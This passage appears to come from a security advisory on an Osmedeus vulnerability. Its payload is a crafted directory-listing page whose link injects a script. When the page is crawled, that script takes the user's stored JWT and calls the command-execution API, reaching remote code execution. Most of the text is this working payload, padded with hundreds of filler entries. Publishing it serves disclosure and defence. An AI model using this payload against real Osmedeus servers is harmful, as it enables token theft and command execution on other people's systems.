- Easily bypass the condition len(fileContent) > r.Opt.MDCodeBlockLimit
- Spider is a module within the general workflow ⇒ a default workflow that is most commonly used
PoC
https://drive.google.com/file/d/1u-YowfzFV1tUqLaZk4s4Y1DykFhJZ8gR/view?usp=sharing
Payload RCE
<script>fetch(window.location.origin+’/api/osmp/execute’,{method:’POST’,body:JSON.stringify({command:’echo 1 >/tmp/js.txt’,password:’’}),headers:{Authorization:’Osmedeus '+localStorage.jwt,’Content-Type’:’application/json’}});</script>
File index payload
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Directory listing for /</title>
</head>
<body>
<h1>Directory listing for /</h1>
<hr>
<ul>
<li><a href="1">1</a></li>
<li><a href="675559605-1278d133b090b74129f65f6d108d2c83.pdf">675559605-1278d133b090b74129f65f6d108d2c83.pdf</a></li>
<li><a href="959f770895133edc4cf65a4a02d12da8-syncbreezeent_setup_v10.0.28.exe">959f770895133edc4cf65a4a02d12da8-syncbreezeent_setup_v10.0.28.exe</a></li>
<li><a href="%5BMS-DOCX%5D-240416.docx">[MS-DOCX]-240416.docx</a></li>
<li><a href="AnyDesk.exe">AnyDesk.exe</a></li>
<li><a href="Attachment.zip">Attachment.zip</a></li>
<li><a href="barker.tar">barker.tar</a></li>
<li><a href="c1awptpm_1721182413858.pdf">c1awptpm_1721182413858.pdf</a></li>
<li><a href="cacert.der">cacert.der</a></li>
<li><a href="caido-desktop-logs-1729480323.zip">caido-desktop-logs-1729480323.zip</a></li>
<li><a href="caido-desktop-v0.41.0-win-x86_64.exe">caido-desktop-v0.41.0-win-x86_64.exe</a></li>
<li><a href="caido-desktop-v0.42.0-win-x86_64.exe">caido-desktop-v0.42.0-win-x86_64.exe</a></li>
<li><a href="cdd">cdd</a></li>
<li><a href="CentOS-7-live-GNOME-x86_64.iso">CentOS-7-live-GNOME-x86_64.iso</a></li>
<li><a href="chrome-integrate.zip">chrome-integrate.zip</a></li>
<li><a href="ChromeSetup.exe">ChromeSetup.exe</a></li>
<li><a href="Code_of_Conduct_Company_All-Consultants_v23_2023.01.12.pdf">Code_of_Conduct_Company_All-Consultants_v23_2023.01.12.pdf</a></li>
<li><a href="CxSAST.950.Release.Setup_9.5.0.100.7z">CxSAST.950.Release.Setup_9.5.0.100.7z</a></li>
<li><a href="C%C3%81C%20QUY%20%C4%90%E1%BB%8ANH%20%26%20TI%C3%8AU%20CHU%E1%BA%A8N%20C%E1%BA%A6N%20BI%E1%BA%BET%20CHO%20DOANH%20NGHI%E1%BB%86P%20NH%E1%BB%B0A%20XU%E1%BA%A4T%20KH%E1%BA%A8U%20V%C3%80O%20EU.pdf">CÁC QUY ĐỊNH & TIÊU CHUẨN CẦN BIẾT CHO DOANH NGHIỆP NHỰA XUẤT KHẨU VÀO EU.pdf</a></li>
<li><a href="Danh%20sach%20may%20chu%20T18.xlsx">Danh sach may chu T18.xlsx</a></li>
<li><a href="de4dot-net45.zip">de4dot-net45.zip</a></li>
<li><a href="de4dot-netcoreapp3.1.zip">de4dot-netcoreapp3.1.zip</a></li>
<li><a href="desktop.ini">desktop.ini</a></li>
<li><a href="disk-1.KkwpoIcO.vmdk.part">disk-1.KkwpoIcO.vmdk.part</a></li>
<li><a href="disk-1.vmdk">disk-1.vmdk</a></li>
<li><a href="dist.zip">dist.zip</a></li>
<li><a href="dnSpy-net-win64.zip">dnSpy-net-win64.zip</a></li>
<li><a href="doc.9.1.0.rar">doc.9.1.0.rar</a></li>
<li><a href="download">download</a></li>
<li><a href="Earned_Achievements_2024-09-16.pdf">Earned_Achievements_2024-09-16.pdf</a></li>
<li><a href="Eazfuscator.NET%202024.1%20Setup.msi">Eazfuscator.NET 2024.1 Setup.msi</a></li>
<li><a href="flare-ida-master.zip">flare-ida-master.zip</a></li>
<li><a href="gitlab-recovery-codes.txt">gitlab-recovery-codes.txt</a></li>
<li><a href="Hacking%20Rust.pdf">Hacking Rust.pdf</a></li>
<li><a href="Huong%20dan%20cai%20dat%20Oracle%20New.docx">Huong dan cai dat Oracle New.docx</a></li>
<li><a href="ida83_sdk_tools_v2.zip">ida83_sdk_tools_v2.zip</a></li>
<li><a href="ida84_sdk_tools.zip">ida84_sdk_tools.zip</a></li>
<li><a href="IDARustDemangler.py">IDARustDemangler.py</a></li>
<li><a href="idb2pat.py">idb2pat.py</a></li>
<li><a href="incident-notification_26.03.2024-2.pdf">incident-notification_26.03.2024-2.pdf</a></li>
<li><a href="ironword.2024.8.3.nupkg">ironword.2024.8.3.nupkg</a></li>
<li><a href="KCSC_Recruitment.pdf">KCSC_Recruitment.pdf</a></li>
<li><a href="K%E1%BA%BF%20ho%E1%BA%A1ch%20%C4%91%C3%A0o%20t%E1%BA%A1o%2005102023%20%282%29.xlsx">Kế hoạch đào tạo 05102023 (2).xlsx</a></li>
<li><a href="linkfinder.json">linkfinder.json</a></li>
<li><a href="Margherita%20Report%20Demo_report.pdf">Margherita Report Demo_report.pdf</a></li>
<li><a href="Mastering_Malware_Analysis.pdf">Mastering_Malware_Analysis.pdf</a></li>
<li><a href="M%E1%BA%ABu-Danh%20sach%20Quan%20ly%20Backup-CS_v1.xlsx">Mẫu-Danh sach Quan ly Backup-CS_v1.xlsx</a></li>
<li><a href="node-v20.17.0-x64.msi">node-v20.17.0-x64.msi</a></li>
<li><a href="OpenJDK21U-jdk_x64_windows_hotspot_21.0.4_7.zip">OpenJDK21U-jdk_x64_windows_hotspot_21.0.4_7.zip</a></li>
<li><a href="OSED%20Notes%20Study%20Overview%20by%20Joas%20Antonio.pdf">OSED Notes Study Overview by Joas Antonio.pdf</a></li>
<li><a href="PAKD%20paytech.xlsx">PAKD paytech.xlsx</a></li>
<li><a href="password">password</a></li>
<li><a href="patriotctf.rar">patriotctf.rar</a></li>
<li><a href="pestudio-9.59.zip">pestudio-9.59.zip</a></li>
<li><a href="photo_2023-01-04_09-04-52.jpg">photo_2023-01-04_09-04-52.jpg</a></li>
<li><a href="photo_2023-01-04_09-04-55%20%282%29.jpg">photo_2023-01-04_09-04-55 (2).jpg</a></li>
<li><a href="photo_2023-01-04_09-04-55.jpg">photo_2023-01-04_09-04-55.jpg</a></li>
<li><a href="photo_2024-09-27_09-47-55.jpg">photo_2024-09-27_09-47-55.jpg</a></li>
<li><a href="Ph%E1%BB%A5%20l%E1%BB%A5c%205.xlsx">Phụ lục 5.xlsx</a></li>
<li><a href="plugin.zip">plugin.zip</a></li>
<li><a href="processhacker-2.39-setup.exe">processhacker-2.39-setup.exe</a></li>
<li><a href="publications.pdf">publications.pdf</a></li>
<li><a href="pwnfox.json">pwnfox.json</a></li>
<li><a href="pykd_ext_2.0.0.25.zip">pykd_ext_2.0.0.25.zip</a></li>
<li><a href="rp-win.zip">rp-win.zip</a></li>
<li><a href="rs.zip">rs.zip</a></li>
<li><a href="rustup-init.exe">rustup-init.exe</a></li>
<li><a href="setup.exe">setup.exe</a></li>
<li><a href="Single%20Page%20Applications%20with%20Vue.js.rar">Single Page Applications with Vue.js.rar</a></li>
<li><a href="Skilled_Person_Registration_Template_2pWPpnl.xlsx">Skilled_Person_Registration_Template_2pWPpnl.xlsx</a></li>
<li><a href="snapshot_2024-10-03_12-14.zip">snapshot_2024-10-03_12-14.zip</a></li>
<li><a href="spire.doc.12.7.3.nupkg">spire.doc.12.7.3.nupkg</a></li>
<li><a href="spire.doc.9.1.0.nupkg">spire.doc.9.1.0.nupkg</a></li>
<li><a href="spire.doc.cpp.11.4.5.nupkg">spire.doc.cpp.11.4.5.nupkg</a></li>
<li><a href="sticker.webm">sticker.webm</a></li>
<li><a href="Telegram%20Desktop/">Telegram Desktop/</a></li>
<li><a href="test">test</a></li>
<li><a href="test.php">test.php</a></li>
<li><a href="test2">test2</a></li>
<li><a href="test1.php">test1.php</a></li>
<li><a href="test2.php">test2.php</a></li>
<li><a href="test3.php">test3.php</a></li>
<li><a href="test4.php">test4.php</a></li>
<li><a href="test5.php">test5.php</a></li>
<li><a href="test6.php">test6.php</a></li>
<li><a href="test7.php">test7.php</a></li>
<li><a href="test8.php">test8.php</a></li>
<li><a href="test9.php">test9.php</a></li>
<li><a href="test10.php">test10.php</a></li>
<li><a href="test11.php">test11.php</a></li>
<li><a href="test12.php">test12.php</a></li>
<li><a href="test13.php">test13.php</a></li>
<li><a href="test14.php">test14.php</a></li>
<li><a href="test15.php">test15.php</a></li>
<li><a href="test16.php">test16.php</a></li>
<li><a href="test17.php">test17.php</a></li>
<li><a href="test18.php">test18.php</a></li>
<li><a href="test19.php">test19.php</a></li>
<li><a href="test20.php">test20.php</a></li>
<li><a href="test21.php">test21.php</a></li>
<li><a href="test22.php">test22.php</a></li>
<li><a href="test23.php">test23.php</a></li>
<li><a href="test24.php">test24.php</a></li>
<li><a href="test25.php">test25.php</a></li>
<li><a href="test26.php">test26.php</a></li>
<li><a href="test27.php">test27.php</a></li>
<li><a href="test28.php">test28.php</a></li>
<li><a href="test29.php">test29.php</a></li>
<li><a href="test30.php">test30.php</a></li>
<li><a href="test31.php">test31.php</a></li>
<li><a href="test32.php">test32.php</a></li>
<li><a href="test33.php">test33.php</a></li>
<li><a href="test34.php">test34.php</a></li>
<li><a href="test35.php">test35.php</a></li>
<li><a href="test36.php">test36.php</a></li>
<li><a href="test37.php">test37.php</a></li>
<li><a href="test38.php">test38.php</a></li>
<li><a href="test39.php">test39.php</a></li>
<li><a href="test40.php">test40.php</a></li>
<li><a href="test41.php">test41.php</a></li>
<li><a href="test42.php">test42.php</a></li>
<li><a href="test43.php">test43.php</a></li>
<li><a href="test44.php">test44.php</a></li>
<li><a href="test45.php">test45.php</a></li>
<li><a href="test46.php">test46.php</a></li>
<li><a href="test47.php">test47.php</a></li>
<li><a href="test48.php">test48.php</a></li>
<li><a href="test49.php">test49.php</a></li>
<li><a href="test50.php">test50.php</a></li>
<li><a href="test51.php">test51.php</a></li>
<li><a href="test52.php">test52.php</a></li>
<li><a href="test53.php">test53.php</a></li>
<li><a href="test54.php">test54.php</a></li>
<li><a href="test55.php">test55.php</a></li>
<li><a href="test56.php">test56.php</a></li>
<li><a href="test57.php">test57.php</a></li>
<li><a href="test58.php">test58.php</a></li>
<li><a href="test59.php">test59.php</a></li>
<li><a href="test60.php">test60.php</a></li>
<li><a href="test61.php">test61.php</a></li>
<li><a href="test62.php">test62.php</a></li>
<li><a href="test63.php">test63.php</a></li>
<li><a href="test64.php">test64.php</a></li>
<li><a href="test65.php">test65.php</a></li>
<li><a href="test66.php">test66.php</a></li>
<li><a href="test67.php">test67.php</a></li>
<li><a href="test68.php">test68.php</a></li>
<li><a href="test69.php">test69.php</a></li>
<li><a href="test70.php">test70.php</a></li>
<li><a href="test71.php">test71.php</a></li>
<li><a href="test72.php">test72.php</a></li>
<li><a href="test73.php">test73.php</a></li>
<li><a href="test74.php">test74.php</a></li>
<li><a href="test75.php">test75.php</a></li>
<li><a href="test76.php">test76.php</a></li>
<li><a href="test77.php">test77.php</a></li>
<li><a href="test78.php">test78.php</a></li>
<li><a href="test79.php">test79.php</a></li>
<li><a href="test80.php">test80.php</a></li>
<li><a href="test81.php">test81.php</a></li>
<li><a href="test82.php">test82.php</a></li>
<li><a href="test83.php">test83.php</a></li>
<li><a href="test84.php">test84.php</a></li>
<li><a href="test85.php">test85.php</a></li>
<li><a href="test86.php">test86.php</a></li>
<li><a href="test87.php">test87.php</a></li>
<li><a href="test88.php">test88.php</a></li>
<li><a href="test89.php">test89.php</a></li>
<li><a href="test90.php">test90.php</a></li>
<li><a href="test91.php">test91.php</a></li>
<li><a href="test92.php">test92.php</a></li>
<li><a href="test93.php">test93.php</a></li>
<li><a href="test94.php">test94.php</a></li>
<li><a href="test95.php">test95.php</a></li>
<li><a href="test96.php">test96.php</a></li>
<li><a href="test97.php">test97.php</a></li>
<li><a href="test98.php">test98.php</a></li>
<li><a href="test99.php">test99.php</a></li>
<li><a href="test100.php">test100.php</a></li>
<li><a href="test101.php">test101.php</a></li>
<li><a href="test102.php">test102.php</a></li>
<li><a href="test103.php">test103.php</a></li>
<li><a href="test104.php">test104.php</a></li>
<li><a href="test105.php">test105.php</a></li>
<li><a href="test106.php">test106.php</a></li>
<li><a href="test107.php">test107.php</a></li>
<li><a href="test108.php">test108.php</a></li>
<li><a href="test109.php">test109.php</a></li>
<li><a href="test110.php">test110.php</a></li>
<li><a href="test111.php">test111.php</a></li>
<li><a href="test112.php">test112.php</a></li>
<li><a href="test113.php">test113.php</a></li>
<li><a href="test114.php">test114.php</a></li>
<li><a href="test115.php">test115.php</a></li>
<li><a href="test116.php">test116.php</a></li>
<li><a href="test117.php">test117.php</a></li>
<li><a href="test118.php">test118.php</a></li>
<li><a href="test119.php">test119.php</a></li>
<li><a href="test120.php">test120.php</a></li>
<li><a href="test121.php">test121.php</a></li>
<li><a href="test122.php">test122.php</a></li>
<li><a href="test123.php">test123.php</a></li>
<li><a href="test124.php">test124.php</a></li>
<li><a href="test125.php">test125.php</a></li>
<li><a href="test126.php">test126.php</a></li>
<li><a href="test127.php">test127.php</a></li>
<li><a href="test128.php">test128.php</a></li>
<li><a href="test129.php">test129.php</a></li>
<li><a href="test130.php">test130.php</a></li>
<li><a href="test131.php">test131.php</a></li>
<li><a href="test132.php">test132.php</a></li>
<li><a href="test133.php">test133.php</a></li>
<li><a href="test134.php">test134.php</a></li>
<li><a href="test135.php">test135.php</a></li>
<li><a href="test136.php">test136.php</a></li>
<li><a href="test137.php">test137.php</a></li>
<li><a href="test138.php">test138.php</a></li>
<li><a href="test139.php">test139.php</a></li>
<li><a href="test140.php">test140.php</a></li>
<li><a href="test141.php">test141.php</a></li>
<li><a href="test142.php">test142.php</a></li>
<li><a href="test143.php">test143.php</a></li>
<li><a href="test144.php">test144.php</a></li>
<li><a href="test145.php">test145.php</a></li>
<li><a href="test146.php">test146.php</a></li>
<li><a href="test147.php">test147.php</a></li>
<li><a href="test148.php">test148.php</a></li>
<li><a href="test149.php">test149.php</a></li>
<li><a href="test150.php">test150.php</a></li>
<li><a href="test151.php">test151.php</a></li>
<li><a href="test152.php">test152.php</a></li>
<li><a href="test153.php">test153.php</a></li>
<li><a href="test154.php">test154.php</a></li>
<li><a href="test155.php">test155.php</a></li>
<li><a href="test156.php">test156.php</a></li>
<li><a href="test157.php">test157.php</a></li>
<li><a href="test158.php">test158.php</a></li>
<li><a href="test159.php">test159.php</a></li>
<li><a href="test160.php">test160.php</a></li>
<li><a href="test161.php">test161.php</a></li>
<li><a href="test162.php">test162.php</a></li>
<li><a href="test163.php">test163.php</a></li>
<li><a href="test164.php">test164.php</a></li>
<li><a href="test165.php">test165.php</a></li>
<li><a href="test166.php">test166.php</a></li>
<li><a href="test167.php">test167.php</a></li>
<li><a href="test168.php">test168.php</a></li>
<li><a href="test169.php">test169.php</a></li>
<li><a href="test170.php">test170.php</a></li>
<li><a href="test171.php">test171.php</a></li>
<li><a href="test172.php">test172.php</a></li>
<li><a href="test173.php">test173.php</a></li>
<li><a href="test174.php">test174.php</a></li>
<li><a href="test175.php">test175.php</a></li>
<li><a href="test176.php">test176.php</a></li>
<li><a href="test177.php">test177.php</a></li>
<li><a href="test178.php">test178.php</a></li>
<li><a href="test179.php">test179.php</a></li>
<li><a href="test180.php">test180.php</a></li>
<li><a href="test181.php">test181.php</a></li>
<li><a href="test182.php">test182.php</a></li>
<li><a href="test183.php">test183.php</a></li>
<li><a href="test184.php">test184.php</a></li>
<li><a href="test185.php">test185.php</a></li>
<li><a href="test186.php">test186.php</a></li>
<li><a href="test187.php">test187.php</a></li>
<li><a href="test188.php">test188.php</a></li>
<li><a href="test189.php">test189.php</a></li>
<li><a href="test190.php">test190.php</a></li>
<li><a href="test191.php">test191.php</a></li>
<li><a href="test192.php">test192.php</a></li>
<li><a href="test193.php">test193.php</a></li>
<li><a href="test194.php">test194.php</a></li>
<li><a href="test195.php">test195.php</a></li>
<li><a href="test196.php">test196.php</a></li>
<li><a href="test197.php">test197.php</a></li>
<li><a href="test198.php">test198.php</a></li>
<li><a href="test199.php">test199.php</a></li>
<li><a href="test200.php">test200.php</a></li>
<li><a href="test201.php">test201.php</a></li>
<li><a href="test202.php">test202.php</a></li>
<li><a href="test203.php">test203.php</a></li>
<li><a href="test204.php">test204.php</a></li>
<li><a href="test205.php">test205.php</a></li>
<li><a href="test206.php">test206.php</a></li>
<li><a href="test207.php">test207.php</a></li>
<li><a href="test208.php">test208.php</a></li>
<li><a href="test209.php">test209.php</a></li>
<li><a href="test210.php">test210.php</a></li>
<li><a href="test211.php">test211.php</a></li>
<li><a href="test212.php">test212.php</a></li>
<li><a href="test213.php">test213.php</a></li>
<li><a href="test214.php">test214.php</a></li>
<li><a href="test215.php">test215.php</a></li>
<li><a href="test216.php">test216.php</a></li>
<li><a href="test217.php">test217.php</a></li>
<li><a href="test218.php">test218.php</a></li>
<li><a href="test219.php">test219.php</a></li>
<li><a href="test220.php">test220.php</a></li>
<li><a href="test221.php">test221.php</a></li>
<li><a href="test222.php">test222.php</a></li>
<li><a href="test223.php">test223.php</a></li>
<li><a href="test224.php">test224.php</a></li>
<li><a href="test225.php">test225.php</a></li>
<li><a href="test226.php">test226.php</a></li>
<li><a href="test227.php">test227.php</a></li>
<li><a href="test228.php">test228.php</a></li>
<li><a href="test229.php">test229.php</a></li>
<li><a href="test230.php">test230.php</a></li>
<li><a href="test231.php">test231.php</a></li>
<li><a href="test232.php">test232.php</a></li>
<li><a href="test233.php">test233.php</a></li>
<li><a href="test234.php">test234.php</a></li>
<li><a href="test235.php">test235.php</a></li>
<li><a href="test236.php">test236.php</a></li>
<li><a href="test237.php">test237.php</a></li>
<li><a href="test238.php">test238.php</a></li>
<li><a href="test239.php">test239.php</a></li>
<li><a href="test240.php">test240.php</a></li>
<li><a href="test241.php">test241.php</a></li>
<li><a href="test242.php">test242.php</a></li>
<li><a href="test243.php">test243.php</a></li>
<li><a href="test244.php">test244.php</a></li>
<li><a href="test245.php">test245.php</a></li>
<li><a href="test246.php">test246.php</a></li>
<li><a href="test247.php">test247.php</a></li>
<li><a href="test248.php">test248.php</a></li>
<li><a href="test249.php">test249.php</a></li>
<li><a href="test250.php">test250.php</a></li>
<li><a href="test251.php">test251.php</a></li>
<li><a href="test252.php">test252.php</a></li>
<li><a href="test253.php">test253.php</a></li>
<li><a href="test254.php">test254.php</a></li>
<li><a href="test255.php">test255.php</a></li>
<li><a href="test256.php">test256.php</a></li>
<li><a href="test257.php">test257.php</a></li>
<li><a href="test258.php">test258.php</a></li>
<li><a href="test259.php">test259.php</a></li>
<li><a href="test260.php">test260.php</a></li>
<li><a href="test261.php">test261.php</a></li>
<li><a href="test262.php">test262.php</a></li>
<li><a href="test263.php">test263.php</a></li>
<li><a href="test264.php">test264.php</a></li>
<li><a href="test265.php">test265.php</a></li>
<li><a href="test266.php">test266.php</a></li>
<li><a href="test267.php">test267.php</a></li>
<li><a href="test268.php">test268.php</a></li>
<li><a href="test269.php">test269.php</a></li>
<li><a href="test270.php">test270.php</a></li>
<li><a href="test271.php">test271.php</a></li>
<li><a href="test272.php">test272.php</a></li>
<li><a href="test273.php">test273.php</a></li>
<li><a href="test274.php">test274.php</a></li>
<li><a href="test275.php">test275.php</a></li>
<li><a href="test276.php">test276.php</a></li>
<li><a href="test277.php">test277.php</a></li>
<li><a href="test278.php">test278.php</a></li>
<li><a href="test279.php">test279.php</a></li>
<li><a href="test280.php">test280.php</a></li>
<li><a href="test281.php">test281.php</a></li>
<li><a href="test282.php">test282.php</a></li>
<li><a href="test283.php">test283.php</a></li>
<li><a href="test284.php">test284.php</a></li>
<li><a href="test285.php">test285.php</a></li>
<li><a href="test286.php">test286.php</a></li>
<li><a href="test287.php">test287.php</a></li>
<li><a href="test288.php">test288.php</a></li>
<li><a href="test289.php">test289.php</a></li>
<li><a href="test290.php">test290.php</a></li>
<li><a href="test291.php">test291.php</a></li>
<li><a href="test292.php">test292.php</a></li>
<li><a href="test293.php">test293.php</a></li>
<li><a href="test294.php">test294.php</a></li>
<li><a href="test295.php">test295.php</a></li>
<li><a href="test296.php">test296.php</a></li>
<li><a href="test297.php">test297.php</a></li>
<li><a href="test298.php">test298.php</a></li>
<li><a href="test299.php">test299.php</a></li>
<li><a href="test300.php">test300.php</a></li>
<li><a href="The.IDA.Pro.Book.2nd.Edition.Jun.2011.pdf">The.IDA.Pro.Book.2nd.Edition.Jun.2011.pdf</a></li>
<li><a href="ThuHo.rar">ThuHo.rar</a></li>
<li><a href="Vue.js%20Master%20Class%202024%20Edition.rar">Vue.js Master Class 2024 Edition.rar</a></li>
<li><a href="VueSchool%20-%20The%20Vue.js%203%20Masterclass%20%282024-4%29.rar">VueSchool - The Vue.js 3 Masterclass (2024-4).rar</a></li>
<li><a href="Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir/">Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir/</a></li>
<li><a href="Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part1.rar">Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part1.rar</a></li>
<li><a href="Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part2.rar">Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part2.rar</a></li>
<li><a href="Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part3.rar">Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part3.rar</a></li>
<li><a href="Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part4.rar">Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part4.rar</a></li>
<li><a href="win%20server%202016%281%29.ovf">win server 2016(1).ovf</a></li>
<li><a href="win%20server%202016.ovf">win server 2016.ovf</a></li>
<li><a href="?abc=<script>fetch(window.location.origin+'/api/osmp/execute',{method:'POST',body:JSON.stringify({command:'echo 1 >/tmp/js.txt',password:''}),headers:{Authorization:'Osmedeus '+localStorage.jwt,'Content-Type':'application/json'}});</script>">yxfzssjq_1721182234998.pdf</a></li>
</ul>
<hr>
</body>
</html>
Impact
Execute command on server
References
- GHSA-wvv7-wm5v-w2gv
- https://drive.google.com/file/d/1u-YowfzFV1tUqLaZk4s4Y1DykFhJZ8gR/view?usp=sharing